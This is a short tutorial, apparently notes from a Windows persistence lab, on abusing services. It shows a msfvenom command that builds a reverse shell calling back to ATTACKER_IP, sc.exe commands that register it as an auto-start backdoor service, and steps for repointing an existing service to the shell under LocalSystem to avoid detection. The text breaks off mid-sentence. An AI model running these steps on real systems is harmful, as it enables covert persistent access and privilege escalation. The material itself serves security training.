Abusing Services

A service is basically an executable that runs in the background. When configuring a service, you define which executable will be used and select if the service will automatically run when the machine starts or should be manually started.

Creating backdoor services

First, lets create a reverse shell using msfvenom.

user@AttackBox$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

Transfer and save this reverse shell into c:\windows and create new service pointing to this revshell.

sc.exe create newservice binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start newservice

Modifying existing services

Instead of creating new service, we can reuse an existing service to avoid detection.

List available services using

C:\> sc.exe query state=all

After finding the desired service, query the configuration as.

C:\> sc.exe qc newservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: THMService3
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2 AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyService\newservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : newservice
        DEPENDENCIES       : 
        SERVICE_START_NAME : NT AUTHORITY\Local Service

The key things to look here are,

• START_TYPE

• BINARY_PATH_NAME

• SERVICE_START_NAME

This service auto executes C:\MyService\newservice.exe under the LocalService (Low Privilege) account.

Lets change the Binary path to point to our revshell executable we created using msfvenom and run it as LocalSystem (Highest Privilege).

Then we can stop and start the service as